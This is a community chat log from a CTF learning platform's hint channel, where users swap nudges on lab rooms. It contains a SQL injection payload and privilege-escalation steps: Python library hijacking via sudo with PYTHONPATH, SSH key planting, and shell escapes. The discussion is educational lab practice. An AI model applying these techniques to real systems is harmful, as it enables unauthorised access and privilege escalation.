#room-hints

once you figure our what the shell is, it should be simple enough

i was up til 4am last night doing random sudo and kernel exploits for user flag and nothing worked 🥲 I probably missed something

you're overthinking

which flag?

user.txt

an

ah

did you get into robert's account?

i got the pass but ssh disabled for it and no home folder no entry in /etc/passwd

yeah...there's a bit of guessing involved

tried the pass for all user accounts in /etc/passwd

it's not on that machine exactly...

i gotcha 😄 /etc/hosts

unless i don't gotcha

the creds you got should hint at something

the form of the creds

there's also an entry in the passwd file that'll hint a bit

Hello folks, I am currently on Linux:Local Enumeration and I am stuck...on SSH of all things (task 3). is there something not listed in the steps that I am missing? if anyone could kick me in the right direction I would greatly appreciate it.

the hint for that one looks like python reversing syntax so assumed it just meant CVE

it's not a CVE for python

you'll understand when you see it

what seems to be the issue?

seems clear to me

thanks for the response. im typing up my steps atm. i didnt want to write a wall of txt while you 2 were discussing lol.

👍

• I have created the key pairs using key-gen on my attackbox...grab the contents of the id_rsa.pub and copied them into the authorized_key folder on the victim.
  -I also had to run ssh-keygen on victim as the .ssh folder did not have an "authorized_keys" folder
  -I also have the id_rsa of the box I am attacking saved to my attack desktop (with permissions 600)
  -When running "ssh -i id_rsa manager@<boxIP>" i get to the password prompt... and then stuck

authorized_keys is a file

and I think you can use ssh-add to update that

I think you're trying too hard though

im sure you're right lol

@wicked bolt think about what creds exist for robert, there is obviously a service that can use those creds

problem is finding it

so about the auth_file...do i need to run "ssh-keygen" so that file appears? cause it was not there at first.. (or am I just going the wrong direction)

you can create it normally

or use ssh-add

unless there's no agent

you can create it manually

no need to run ssh-keygen

at least not on the victim box

though you could, then download the private key and use that

probably still needs the authorized_keys though

and i did try that as well (prob did it wrong but that was what I was going for lol). i added my attackbox id_rsa.pub to the newly created authorized_keys file....and then also copied the private key of the victim to my attack box and modified permissions to 600. then tried to login using the priv key but still no dice. o well. Ima keep bangin away.

can you screenshot the remote .ssh directory?

oh

yeah do one or the other, not both

either you use the attackbox ssh key, in that case you add its public key to authorized_keys

OR you generate a keypair on the target and use that private key

Hydra, I think I have potentially found something from 'ip route'. Cheers

oh does that work?

I wrote a port scanner in python...

that makes sense. ok im gonna start this section over. thank you for your help.

good hunting

i got it :D:D:D

huzzah!

and now the hint makes sense

root should be easy enough once you know what you're dealing with

nope, still doesn't never done anything on this particular product

the hint for user I mean

OH. YEP. now it makes sense after checking for some certain thing.

and i can imagine how to get root on the 'top level' from here but I'll have to do some research

there's a serious misconfiguration

need haaalpppp

@atomic marten just ask the question, please

mission 12 flag in linux agency.. Couldnt understand the hint

neither got the flag

ok

ya , on to root.txt now

good hunting

@atomic marten the hint is a bit weird.

Very weird. What is EVS though?

EVs

maybe is better

😆 😆 😆 ...got it first try this time. amazing how frustration just makes crap more difficult lol. thank you again @ripe hedge

haha yeah, taking a break helps sometimes

yeah what is it

a certain type of variable

got root on the main machine easily. But still that blue whale hint doesn't make sense. Oh well room done 😄

check out the logo

GOT it thanks <3.

@wicked bolt

https://tenor.com/view/whale-docker-container-gif-12376852

haha amazing yeah ok makes sense. I enjoyed the 'green indian bath soap' one i had to google it and try to find it. The hint is harder than the solution!

yeah I googled that too

I saw blue whale and yeah, but I'm used to using that thing

Did yal do linux agency in one day?

not sure how i didn't see any files related to that during my whole run through the machine. I feel like i have more of an understanding what's on that host than on my own

I did it in about 3-4 hours?

heh there's an entry in /etc/passwd

and a group

but none of the users can run it. Still not sure who the diane user is though

you mean the zerotier thing? I didn't make that link

i googled it but didn't understand it's for that

no there's another user lying around

no matter

strange. It's not in /etc/passwd but is in /etc/group

should be user 127 or something

I wanted make sure i'm not going mad but defo not showing in passwd for me I learned a lot from this room and it was very enjoyable! 😄

hmm, oh well

make sure it's the passwd from the main host, not the container

Does anyone know what's up with the password hash pastebin-link in the Introduction to Django room? It's not necessary for any flags, so I was just wondering.

@ripe hedge you found the IP via a python script you said? so like a local nmap-like thing

the port, yeah

it's a pretty dumb script tbf

wait you can just connect to a port on the same machine?

yes?

did you do something silly?

can I pm

I've already done it

Hey guys I've been working on the Linux Agency room, but can someone explain what EVS is?

go ahead

EVs is probably the better hint

Oh lmao I was looking for what the acronym would stand for

I was stuck in the same question

You know what Is about 'send money to other country'

what do you do when you send something from one country to another

anyone knows how can I distract a snake ?😆

ooooh it's a snake(y) shell

haha good one.

gods I'm old

yep

half the people here weren't even born what that came out

I did not try it until mid 90es

Not sure about it .. maybe I package the thing in a box

wow it's been a while since the thm hash wasnt to be found in the rockyou list

think it like if you were a company. There is a name for that process. Also a word for getting things from other countries.

haha the money thing got me for a while but there might be a way to read what it wants from you

should be a way to read strings from a binary...

I wonder if the robert task is the obvious way or if I am overlooking something and just waists time cracking hash

looking for a hint for overpass3 thanks

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Please don't ask the same question across multiple channels like that

anyone is onto linuxagency ?,

half the people here 🙂

how to crack md5 of mission1 ? l have tried some solutions couldnt come up

hash looks hashcat m0 but couldnt come up

hashcat mode 0 is md5

Try online crackers for md5

tried not working

any valuable hints?

You dont need to crack the hashes

Just provide the password in the md5 form itself.

🙂

hey where are u with the linux agency room ?

struggling with 26

but su mission1 and that hash wont giving authority

ah ok

use the whole flag as the pass

lol

cryin now

use the entire thing

thx

Like.. the entire flag

yeah .. it was menioned in the text above the challenge

XD

@atomic marten may I ask you for a hint in the DM?

anyone in the priv esc section ?

sure man. But you have to send fren request to me too

need a little help with getting jordan ik what im supposed to do but no luck yet

probably the obvious way

ah hydra didnt wanna ping u

you don't

more snakes

yea yea ik what i gotta do

have fun

but i dont know where i should put the thing

i dont have write perms

put it somewhere else then

i tried adding to path

and everything

the snakey path?

ohhh

there was a room somewhere that exploited this...

give me a sec

I think it was Wonderland

yea wonderland

but u had write perms there

Please, no hints on Linux Agency for 72 hours. I know it shows as a Walkthrough room, but it is really a challenge room. The only reason it was changed to Walkthrough is to keep the amount of points for the room in-check. Remember, hints spoil it for people who like to complete the room without hints. 🙂

eh, @trim haven said it was fine

shrugs

@hexed crescent As it is marked as a walkthrough room, I went under the impression it's a walkthrough, wasn't made clear.

Yeah, it's confusing. I pinned my message to make it more clear.

Not a spoiler or a hint on Linux Agency, but I'm on the struggle bus trying to get Dalia's password

Waaaa

You don't need it. 🙂

I need to try harder and smarter

Think like Agent 47. 😄

yea im still stuck on jordan

What like, having depressing thoughts about being an orphan? Or being haunted by all the people I've killed? Or debating laser removal of the stupid barcode tattoo on the back of my head?

Think outside-the-box in order to survive. 😄

haha that's a huge hint

That is not a stupid tattoo. It represents him.

what does "Send the money to another country" hint for bribe means?🤔

It's a cryptic hint of what to do for the task.

yeah....you'll understand once you finish the task

If English is not your first language, it might be a bit harder than usual.

hydra can i DM ?

English is not my first language, is there a bit hint? 👀

Anyone complete the ZeroLogon room? That was a fun little project

The modification of zerologon_test.py is very simple, once you have that correct you are 4 commands away from scoring a root Powershell in the domain controller

hey. when I get viktors flag then that means I get viktors password right? Similarly when I got dalia's password I am trying to change the user to dalia its showing that the password is wrong

Why?

no its not their passwords

its just their flags

I have been loggin in with their passwords since the last exercise

that was for the fundamentals

not the priv esc section

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

The linux agency room is still under hints embargo

what for?

Im playing linux agency
I am on mission22
Plz help me
Hint is
Sh!oot! we are surrounded by snakes and need a good way to escape from here...
Im stuck

Please check the pinned messages about that room

ok
thnx

i need help with a linux fundamentals 2, trying to find shiba3's password but dont know how to do it!!

What does the task say?

This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.

how do i find out if test1234 exists??

You don't

That's what the binary does

You need to make those checks pass

Create and set the variable

Run the binary

with touch command?

search more about how to declare env variables

No. Touch creates files.

Read back over the $ task.

oh, i see its exporting

set the environment variable, thanks!

maybe the information that the flags are not the user passwords in the privilege escalation part of the most recent room should also be pinned

Did u finish the room ?

nope

Any hints for mission 8 of Linux agency?

Not yet. Rule 13 applies

Oof

Kk

Can someone hint me about Mission8 in Linux Agency ?

I am working on it too

got it 🙂

so lets say I am in silvio's machine. I generate a ssh key and put the public one in silvio's authorized keys and I get the private key with the help of a python server, and I have set all correct permissions , then why cant I ssh into the machine as silvio???

It says the connection is refused by port 22

😦

Its very difficult because I cannot save my progress in anyway.. 😦

Check /etc/ssh/sshd_config. Only few users can login using SSH

So the privesc portion, I have to do without ssh??

Yes

Then I have to do all of them in one go. becaus ethe passwords arent the login passwords they are just flags

😦

@atomic marten @feral parrot @eager saffron You have all been made aware that rule 13 applies here. The next time will be a warning or a mute.

👍

stuck on Linux Agency mission12 flag, hint "Maybe it is time to study some EVS", any more suggestions?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

k

Please try your best in the 1st 72hours of the release of linux agency after that if you are unable to solve something I would be very grateful to help you

Are you the creator?

Yes Sir

Because if you are, you're free to override that policy if you want

No I am fine with the rule as its competitive for 1st 72 hours after that its just learning

Cool, ok

Btw did you attempt the room

Not yet

i attempts room @dim wasp

Dalia is being mean to me 😭

Nearly 48hours of try harder to all of you

@dim wasp i show you how i get the root?

Did you find any unintended routes?

@dim wasp i follow intended route because it was straightforward

didnt search for unintended

Nice job

I hope you enjoyed the Room

yes, was fun ty

yeah fun room but the hints are mostly confusing me more than helping 😄

Reached mission28

No idea what to do

😫

Thanks. I was losing my head over figuring the acronym out.

Deja vu

@dim wasp nicely made room i am almost completed ( or have i? ) onoto privsec stuff

Agreed. The dynamically changing file name is messing me up.

This is the room-hints channel. If you want to report something not working, please use the #room-bugs channel.

oops sorry

i will transfer my query there

I used google...

https://tryhackme.com/room/linuxagency
jordans flag

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

@timid sequoia Not yet.

okok

i might have a couple, but i'd have to pm

mainly because i'm not sure if they're intended or not 😆

Please read the pinned messages.

I get it

Physical Security Intro:
https://tryhackme.com/room/physicalsecurityintro
Task: 6
Question 3

It is not mentioned in the video but it is very commen for cars. It can be pumped

Sparrows sell them

@dim wasp just completed the Linux Agency box. what a time machine ride, rewinds so many things. thanx man

Not sure if it has been 72h since its release, as it says the room is 18 days old. I am stuck on the last escalation to get root.txt, any hints on how to beat the blue whale?

18 days are when machine submitted on thm

It has not

Gotcha! I'll try harder 🙂

Not quite, 18 days was when they made the room, not uploaded anything or created a VM or submitted it

And thanks for clearing that up, I was often confused at newly released rooms showing age >0

Check in #announcements

Glad you enjoyed it

https://tryhackme.com/room/sqlilab

on sql injection 3,4

why do you have profileID=-1' or 1=1-- -

im confused about the minus one

the rest make sense

I think this is just a typo, is that give any positive result?

yeah

it gives positive results without -1

they both work

yeah its probably a typo

I mean

It could just be a randomly chosen value

maybe

good job people for the help

Try to debug the query if it makes any sense

too hard

wait I think I know what you mean

Bruh
Someone uploaded linux agency walk through
On the net

Let the people play

I did the first part already Linux fundamentals
Was really fun playing it

found the query

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='-1' or 1=1-- -' AND pass...

it does make sense now

i see why the minus one doesn't make a difference

Thx

Just don't go looking for them

Just don't go looking for them
@stuck fractal
Yes sir

But still
It should be a fair game at least for some hours

Btw there's no fun seeing the solutions then solving

Yeah, except THM can't really police writeups

You're not allowed to post them in the discord unless they're approved on the site

Hmm

Nice

Guys am not able to download sparky 2.8.3.(dkg) it's showing parallel read and NT_ something error in "Ra room" can anyone help me with that?

LINUX AGENCY : I got into r*(user.txt) and now i don't know what to do! any help?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

Not yet.

okay

See rule 13

-warn @white salmon Please remember rule 13 and don't try to bypass it by telling people to DM you.

⚠ Warned helpme#7993

There is a pin...

@white salmon please don't ask the same question across multiple channels at the same time

Ok 👍

I am stuck at mission24 in "Linux Agency" room. I have looked at dig, host and /etc/hosts but found nothing. Missing to understand the hint ( I guess it is related to regex or '{' but unable to relate how to use it). Can someone help?

i don't have any experience with cars used Google To search but wrong

It a kind of ballon - typically flat and black

jordan is killing me lol

There are loads of locksmith type blogs out there, dealing with getting into locked cars. They will mention something you can use to hold a door open (the 5 letter word) and advise you use this type (see Kim Schulz' hint - the 3 letter word) to avoid damage. Like using a balloon.

Please do not send writeups.

Ok sorry

another 24 hours before any hints/help can be provided on this room

no help/hints within 72 hours of it being released

@blazing thorn - thanks for the information, I was able to get past

hi i'm currently doing cyborg room and i have ||cracked the password for music_archive but i'm unable to go any further i tried ssh with same creds but it didn't work is there something i'm missing or should i look somewhere else?|| just give me a tiny nudge i will find the rest

||there should be a clue in the root directory of the archive I believe, it tells you the type of archive it is||

The clue might not be ||in the root of the archive, but you can find it if you dig a bit.||

yup, can't recall where exactly but it's there 🙂

actually i digged a bit and found ||some binaries and on running them the provide borg seg@?:not found which borg segment|| i will still keep digging to see if could find anything there and in other files

I think you're overthinking it a bit. ||Dig into the archive more. See if you can find something to read.||

Hi everyone I am currently on the SET Room, and having some issues ||capturing hashes when using the ZIP File|| can anyone give me a nudge or hint on what I am doing wrong?. Thanks!!

okay thanks i have checked it i didn't thought of ||trying to crack something in config as i wasn't getting anywhere i will look deep into it ||

never mind, found it 😄

in room "Physical Security Intro" - (cool room btw) - I have tried a number of different things that could do this but not the expected answer;
The second answer for "An improperly hung door which opens away from you can be bypassed using this type of tool?"

• anyone who has done this got any hints? last question I can't get for this room.

Did you find this one or was that another thing?

no, I had another room question that I did work out only after posting haha

this one I did not find

Ok, it's ||something you can do to padlocks too|| that's quite a big hint
You're pulling the latch back from the strike plate, by sliding something in

Can I DM you @stuck fractal ?

I can't think of a way to say anything more without spoiling it and I'm about to grab food. I'm not sure DMing me would help that much

ok no problem, thank you I'll see what I can do

This question is repeated I guess and the first answer was something you can do to padlocks as well so I was just not sure if you were giving hints for the first copy of the question or second 😄 but I'll take the advice and see what else I can find

The most recent question you asked about improperly hung doors

yeah, there are two of the same question;

I had some ideas that even fit the lettering and were in the referenced video's but it didn't work, i'll keep digging 🙂

Oh

Well that's confusing

hahah, yeah a little

to ask about, anyway

check Deviant's "resources" page, it's on there

☝️ same hint I got, helped me find it

will do, thank you!

wow I even knew this tool and had input it with 10 other forms but never heard it called that, thanks again 🙂

yup, was new to me too 🙂

"physical intro" must be the hardest room on THM.. took 2 months, average, I think.
much more if you are not english language native.

English language native, found it tough

Can I DM someone for the Set Room? Having some issues for the Hash Capture

having a bit of trouble with https://tryhackme.com/room/rpwebscanning Running into issues with this question as the answer I'm seeing seems to be wrong

Don't look too deep, you have a password and an archive....

dalia's flag is driving me crazy lol D:

Any tips on what could I look to continue the room internals ? I have managed to get the credentials to enter the wp-admin. Tried to find some vulnerabilities on wordpress, but they requiere me to install plugins which I can't seem to do, and I can't edit the ones already installed because I don't have permissions. Am I missing some vulnerability there ? Should I go for another route instead ?

Haven't done that room in particular but there's a generally reliable way of getting malicious code to execute with stock WP dashboard options

And you won't be able to install plug-ins unless you're compiling from source as vulnerable machines are not connected to the Internet

Alright! Thanks

finally did it

Its php, so....there you have it! :)

@spare lagoon Rule 13 applies here, no help or hints yet

oh sorry, my bad

Thanks Alex, I will think about that when I come back to it.

Question has anyone attempted this CTF room: https://tryhackme.com/room/kuberneteschalltdi2020 and struggled with connecting with the kubeconfig command.

Hello all, i am doing Skynet, and I am at the point where i got into the squirrelmail inbox and got the Samba password for Miles. The run through says go into Miles share drive. His share drive says"NO ACCESS" when I smbmap it. I then try to smbclient //10.10.252.216/milesdyson to try and get into his share with the password that i got. says tree connect failed: NT_STATUS_ACCESS_DENIED

Anyone know how i can get into the share drive?

Hi, please help, I'm really stuck at physical intro room. Exactly at hardware bypassing. Question 3, 5 and last. I have been searching for hours

@light phoenix Please only post in one channel.

sorry 😦

Screenshot

Notice how it says Workgroup\root's password?

You're not specifying a username

ok thought it was in the syntax

No

my machine just shut down, gonna be aloser and finish this tomorrow

That's the share name

so

smbclient //10.10.252.216/milesdyson -u milesdyson

?

when i tried that, it said the same NT_STATUS_ACCESS_DENIED

didn't ask for my password

-U

It's case sensitive as the other person said

As in case matters

ah gotcha! Switch right

TY Sir!

any subtle hints for cyborg, ive got the info for ||squidproxy and the password|| not sure what to use it for, not familiar with this proxy, have tried triggering basic auth via port ||3128||could i get a push in the right direction? gracias

you should look at cy"borg"

Anyone able to give me a little nudge with Year Of The Rabbit room? I have made it up to the point where ||I found the ftp account and have got Eli's_Creds.txt, I have thrown the file into cyberchef with some common operations and nothing came of it, I have also removed everything but the .- characters to see if it was morse code hidden in there and that gave me nothing|| Don't really know where to go from here, cheers!

Any hint on Silvio's flag in the room Linux Agency

@white salmon i think no help or hints, rule 13

Yah, that’s correct. Although I believe it’s 7pm (GMT) tonight when hints are ok

So confused as to what I need to do, there's nothing inside that file

the binary checks the conditions mentioned so you need to fulfill them

I mean I'm trying to do find ./test1234

yea the second part of instructions mentions what you need to do

Yea I got it. Ended up looking at a walkthrough, but I do understand it so that's good!

Hint for linux agency mission4

@devout tangle

Oh Thanks

Did you find ||the page with the chat on it?|| That tells you what to look for. Or you could look around the website, see if you can ||download || anything.

can we ask hints on Linux agency now?

@flat dawn 72hrs isn't over yet

allright

0day room, I am having trouble compiling the ||kernel exploit|| , following error stops me ||gcc: error trying to exec 'cc1': execvp: No such file or directory||. Anybody else had this problem?

hi all, in the nmap section - task 14 "practical" what is the target ip address?

I saw the ||cc1|| file exists on ||/usr/lib/gcc/x86_64-linux-gnu/4.8/||. Tried adding it to the PATH but same result

||/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.:/usr/lib/gcc/x86_64-linux-gnu/4.8/|| Srry, edit

@lunar pulsar Room-hints is for people who want a nudge, please avoid suggesting write ups in this chat :)

can I pm anyone about Keldagrim, just have one or two questions

No asking for hints on that one @storm venture The room is brand new.

Ahh right, my bad

Linux Fundamentals Part 2, Task 11
I have both ||$USER|| and ||$test1234|| set as ||shiba2|| but when I try to access the ||shiba2 binary|| it says ||cat: /etc/shiba/shiba3: permission denied||

is there something I'm missing here 🤔

I do have to leave for work soon so I'd really appreciate it if I can get a hint or two soon 🙏

can u use sudo?

nop

for the record I have done ||export test1234=$USER||, which seems to be the solution I've found through searching the channels

but $USER is not set to anything

so i don't think using export test1234=$USER would do anything

^ I did not have this issue

$USER was set to shiba2 for me

what?

it's not set to shiba2 for me

u deployed the machine or started attackbox?

I ssh'd in using putty

i can't even understand what's going on

what am i supposed to do?

what is manpreet108 typing?

dang dude chill

Hi Everyone
I am new in this group and recently join Tryhackme . I am doing practice on buffer overflow and unable to get reverseshell
I am able to find offset value, badchar, ESP JMP value and return address and open local port on machine and at the end when i generate reverse_shell and run exploit .Again oscp.exe application crash but not getting reverse shell.
I go through all youtube videos and websites and doing same process but unable to figureout what is wrong .
So Please Please advise as i am stuck on this from few days . plsssssssss

i'm chilling already

im gonna try terminating and relaunching the machine and see if that fixes my issue

case sensitivity might be your issue

ok apparently restarting the the machine fixed the issue 👍

that was a weird one

I had the solution right but for whatever reason it wouldnt work ¯_(ツ)_/¯

could anyone possible answer a question regarding the Windows PrivEsc Room?

its in regards to the rogue potato method of obtaining system, it keeps making referce to the same binary for popping a shell, but it wants me to execute that binary while already in a shell created by that binary, so the ports in use

seems to me I would need a second binary configured to a second port, is this correct?

@white salmon please don't ask the same question across multiple channels

Hey guys , any hint about " how install custom lib in Python " ? 🙂

@midnight spindle what room?

phew, finaly root on linux agency - its was hard - I learned so much - big thanks to the guys who made this room

Linux Agency still under rule13?

@stuck fractal I THINK it will be usefull for Linux agency ^^

@sturdy folio yes

@midnight spindle Rule 13 still applies here

ok 🙂

@dim wasp Hey, man, your linuxagency room was AWESOME. Felt like a CTF.

learnt some new stuff from Linux Agency and built up on basics xD but still stucked at last flag

hey all, hope you are all well.

i am a little bit stuck on the Linux fundamental 2 room where you have to log in to putty with the shiba2 account, when i go to log in it says that my connection has timed out. Has anyone else had this issue?

Are you connected to the vpn?

nope, haha can tell i am new to this, that worked thank you very much.😀

Still stuck on the Adams Rite bypass. Have been down the knight rabbit hole. Believe that I could now speak well to how knights fought, what they wore and siege tactics. Feel like I am coming at this from the wrong direction.

Something they hold

Also used by spacecraft to protect against heat, something similar to protect against radiation

Nope you're in completely the right area. The catch is that the question is looking for what you might call the activity rather than the thing. So if you put a block in, you would be blocking...

can someone please give me a hint for user.txt in linux agency??

'Activity' is what worked. Cheers!

@still fern not yet

2 hours left on the hints embargo

ok

SQL Injection Lab Task 3 help ?

@kind bear this is the room hints channel

thank you rooted your hint helped me alot 🙂

@dim wasp and @hollow swan : thanks a lot for the linux agency room ! It'was really nice !!

@midnight spindle glad you enjoyed our room🤓

good job @hollow swan and @dim wasp on the linux agency room

I'm now stuck at sean flag, but really fun so far.

Can you help me with silvio's flag?, I'm stucked there since yesterday and cant't figure out what I'm missing..... Thank a lot in advance!

@white salmon did you already got dalia's shell

yes

hey guys, I am trying brainpan room and i'm a bit stuck after gaining a shell. After running linpeas there is sth that ||can be executable with sudo /home/anansi/bin/anansi_util||. Am I in the correct path or should I look elsewhere?

Then check if you find something interesting with ||sudo -l||

thanks man, I'll check it!

Linux agency bludit Kills me. Mission 1 to 29, easy. But 30 i have nö idea😩

No PHP on the server. The hint doesnt Help.

the hint is kinda misleading try the looking for the flag in the default linux files in the users dir

can someone give me a hint? (Theseus room the first question ) After decoding that message in the main page it`s telling about key, but what key?

if im not mistaking

@balmy verge thx. Will have a look

Any hint on sean flag for linuxagency room would be appreciated

what group is he a part of ? and what perms does the group give him ??

thx

In the Linux Agency Room:Jordan, should I be able to read the file (ls -lah suggests not). I’m looking at ||python hijacking|| as suggested by others, but these seem to need me to know what ||modules are being imported, and then poison those based on the Python search order||.

PYTHONPATH

look it up

Yes I’m seeing examples of that, but don’t I need to know ||what modules the Gun-Shop.py|| script is importing?

if u run sudo -l u || can run the script as jordan and when u run it u'll see a python error which tells u the name ||

can someone help my man

Thanks, will check this out now.

I am not seeing any python specific errors unless I'm misinterpreting them

||sudo -u jordan /opt/scripts/Gun-Shop.py
sudo: unable to open audit system: Permission denied
sudo: pam_open_session: System error
sudo: policy plugin failed session initialization
||

Python not my strongest point so that is going to be an issue 🙂

yes that was a weird error someone else dm'd me had, i didnt have that error tho

can i dm

ofc 👍

can anybody offer a hint for linuxagency mission4 flag

Pretty sure hints are banned for that room

the hint in the task is really helpful || maybe u are too feline "CAT" ||

Hi guys, can someone help on linux agency room at dalia's flag?

Got Dalia or trying to get Dalia?

trying to get dalia

Tick tock...

i've found the script

but it always change from the root

You've got it then

You have 30 seconds to modify it before it gets executed and mashed again. Tick tock.

yeah the hint is not helping too much i understand the hint just not finding the file the user can read

Are you in the right place?

try reading the file with something other than cat

I need to change it right after it change? I think I am doing that

There's a watch command that may be useful

date is helpful too

ohhhh ok got it thanks

I kept Ctrl+O to be sure 🙂

watch cat scriptname.sh

I’m still struggling with this — trying to follow another tutorial to simply output whoami, but still getting the same error.

You're trying too hard

😦 getting that error too @solar needle

Why pam_open_session?

Seems to be the function that’s being called?

unsure, I get that withouth even trying python hijacking

Who cares?

I just spawned a shell

its giving some ppl a weird error whe they try to run the script with sudo

Yeah but they're overthinking it too

Lib they're using seems broken

You want to hijack the Lib call

Actually is there any problem with user4?

@ripe hedge I can't get to the lib call stage

I used export PYTHONPATH

But it didn't worked

You'll call the shop library by running gunshop

Hijack that

I tried but failed to import shop

Make sure the path is readable by jordan

How

Use /tmp or chmod?

How else?

I was using /home/reza lol

🤣

So did I

It worked?

But I changed the access rights first

I’m only seeing this error. Could this be why I can’t solve this user?

Chown then right?

I’m using /tmp as it’s writable by everyone I think

Chmod is sufficient

Chmod 777😂

Sure it's overkill bit sure

i didnt face this erro just a python error specifying the missing module

yup, used that

and it worked for me

I’m not seeing a missing module error

yea dont know why some people get that error

@ripe hedge ok export PYTHONPATH=/home/reza and then place shop.py there and chmod 777 and just run it ok

You'll need to set the path for Jordan in the sudo command

Anything unsual in my current env?
||LS_COLORS=
LANG=en_US.UTF-8
LESS=-ix8RmPm Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$PM Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$
SUDO_GID=1033
OLDPWD=/home/reza/tmp
USERNAME=reza
USER=reza
MAN_NO_LOCALE_WARNING=1
PWD=/home/reza
HOME=/home/reza
SUDO_USER=reza
MAN_ORIG_LESS=
GIT_PREFIX=
SUDO_UID=1033
MAIL=/var/mail/reza
TERM=unknown
SHELL=/bin/bash
MAN_PN=git-config(1)
SUID_UID=1033
PYTHONDONTWRITEBYTECODE=1
SHLVL=2
MANPATH=/usr/share/man:
LESSCHARSET=utf-8
LOGNAME=reza
PATH=/usr/lib/git-core:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
_=/usr/bin/env||

I don’t know that shop is the missing module because running with Jordan returns the following error only

Do you have a proper shell?

Import tty i guess

/dev/tty

I usually do the export TERM=xterm

And then stty raw -echo;fg

But it’s not stabilising this shell

I cant find what to add in the file right now so I will leave it for another time to clear my head.. Thanks for the help though!! 😄

check crontab file

He got that part

Try python3 import pty method to import tty

That’s how I got all my shells so far

And pty.spawn etc

Yes I can't figure out what code should i add in the script

Happy to help, feel free to give me a buzz

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ this article always helps me with stabilizing shells

How would one get a shell from a user without a key or password...

Some people are listening ;)

I’ve done this and am still getting the unhelpful Python error.

same

It's probably something easy, but my mind is frozen right now xD

hey say Im on user3 and my shell dies then I have to start again from user1 bz thats what im doing😂

Yup

There's a checkpoint a bit later

maybe its different python version ?

Sometimes I wish my cat could go on the Internet …

The python in the sudo command is the correct one

Meow

Cats don't go backwards very easily though

If I specify the version it prompts me for the password.

Yeah cause it's not the command you're allowed to run

Exactly. But when I run it exactly, it generates an error without the shop module other people are seeing. Hmmm

@solar needle how have you moved from user to user from viktor to this stage? I think we may be doing something incorrect along those lines

I'm responding to this a couple weeks late..but as far as I can tell-- you don't actually find the version. I think folks just know what the vulnerability is, and just use the exploit that they know is going to work. I haven't been able to find the version anywhere

Hope you took notes and reset the VM?

yup, have notes 🙂

@cold oracle When you're logged in it's on the dashboard

I’ve been getting the same error for 2 days, and have deployed around 4 times now.

If you're not logged in, you don't see it

Might be how you're getting your shell then

I think that's it

I'll start again from VIktor and put notes in spoilers here

thanks, i thought enumeration would find that. scratchin ma brain a lil bit

technically version numbers can be considered excessive information

So from Viktor || I’m using a bash reverse shell to get to Dalia. From Dalia I used a standard GTFOBIN to spawn /bin/bash, and the same again for git||

OWASP recommends against sending any more information than you need because version numbers let attackers search for exploits easily

yea i was looking through writeups...lol and nobody mentioned that

Sounds right

I mean, they're aren't 45 different exploits, so I figured they just guessed the exploit and the version

I’m giving up for the day — will try again tomorrow 😭

what git route did people take for ||silvio to reza|| ?

Var

which option is that on GTFO?

e?

One sec

ty

A

thanks @ripe hedge

I am no longer getting the error when running the python script now

I was using (b) originally for git

very strange... onwards! 😄

A was the only one I got working

The difference is subtle

On linuxagency ||what do you do with roberts ssh key? I got the passphrase but I can't figure out what I'm supposed to do with that info ||

Ssh somewhere I guess?

I mean it's an ssh key

@verbal flume I'm working on the same task, no luck so far

What does one normally do which an ssh key?

||SSH into a host, I'm not sure which host I'm supposed to use.||

||There is a ssh server listening locally ||

Try them all

||At localhost?||

Also look around. I'm told it's possible without a script

||ss -aln ||

||I wrote a port scanner...||

ok, have made it to sean 🥳

@manic citrus thanks for the tips

||Is it port 2222||

yes

I'm already in, now time to find the user.txt file

||Do I need to overwrite id_rsa.pub, I tried just moving it and using the passphrase for id_rsa, but that defaults me to robert's pw||

On the root.txt

||No you do not need to overwrite it ||

@solar needle how /tmp worked for u I tried but same no module name shop

I’ve given up for today

Have you created a module ?

I think my shell is kaput

Yeah shop.py in /tmp and chmod 777 shop.py

|| are you specifying PYTHONPATH in the CLI when calling the script, or actually updating the PYTHONPATH? And if the latter, wouldn’t that just change the PYTHONPATH for reza, rather than Jordan?||

Export pythonpath=/tmp

||Ok SETENV: in set in the sudo config. So you can add environment variables to the sudo command for eg sudo PYTHONPATH=/tmp -u username command||

